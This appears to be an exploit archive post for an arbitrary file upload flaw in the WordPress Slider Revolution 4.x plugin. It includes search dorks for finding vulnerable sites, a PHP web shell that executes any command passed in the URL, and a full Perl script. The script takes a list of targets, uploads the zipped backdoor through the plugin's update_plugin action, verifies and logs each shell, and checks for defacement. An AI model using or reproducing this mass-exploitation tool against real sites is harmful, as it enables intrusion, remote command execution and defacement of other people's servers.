=================================================================================================
| # Title     : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit   |
| # Author    : indoushka                                                                       |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)            | 
| # Vendor    : https://www.sliderrevolution.com/                                               |  
| # Dork      : index off revslider\backup                                                      |  
                plugins/revslider/public/assets/css/settings.css                                |
                revslider.php "index of"	                                                    |                                  
                wp-content/plugins/revslider/ 2013	                                            |
=================================================================================================

[+] poc :

[+] Web shell upload :

    The following perl exploit will attempt to upload backdoor through the update_plugin function
    To use the exploit, be sure to compress the backdoor file with name [revslider.zip]
	Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension
    Because the exploit uploads a compressed file to the target
	
[+] simple backdoor	:

     <?php
     $cmd = $_GET['cmd'];
     system($cmd);
     ?> 

[+] create a text file with name list.txt to save in it your targets

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :
 
#!/usr/bin/perl
 
use LWP::UserAgent;
 
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 
head();
 
my $usage = " \nperl $0 <list.txt>\n perl $0 list.txt";
die "$usage" unless $ARGV[0];
 
open(tarrget,"<$ARGV[0]") or die "$!";
while(<tarrget>){
chomp($_);
$target = $_;
 
my $path = "wp-admin/admin-ajax.php";
 
print "\nTarget => $target\n";
 
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
my $req = $ua->get("$target/$path");
if($req->is_success) {
print "\n  [+] Xploit Possibility Work :3\n \n";
 
 
 
print "  [*] Try Exploiting Vulnerability\n";
print "  [*] Xploiting $target\n";
 
my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);
 
print "  [*] Sent payload\n";
 
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "  [+] Payload successfully executed\n";
 
print "  [*] Checking if shell was uploaded\n";
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;
if($check =~/<br>/) {
 
    print "  [+] Shell successfully uploaded\n";
    open(save, '>>Shell.txt');
    print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n";
    close(save);
 
 
print "  [*] Checking if Deface was uploaded now\n";
 
my $def = $ua->get("$target/leet.html")->content;
if($def = ~/Hacked/) {
 
print "  [+] Deface uploaded successfull\n";
 
 
} else {print "   [-] Deface not Uploaded :/"; }
} else { print "  [-] I'think Shell Not Uploaded :/\n"; }
} else {
print "  [-] Payload failed: Fail\n";
print "\n";
 
}
} else { print "\n [-]Xploit Fail \n"}
 
sub head {
print "\t   +===============================================\n";
print "\t   | Auto Exploiter Revslider Shell Upload \n";
print "\t   | Edited: indoushka\n";
print "\t   +===============================================\n";
}
}

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |
                                                                                                                                      |
=======================================================================================================================================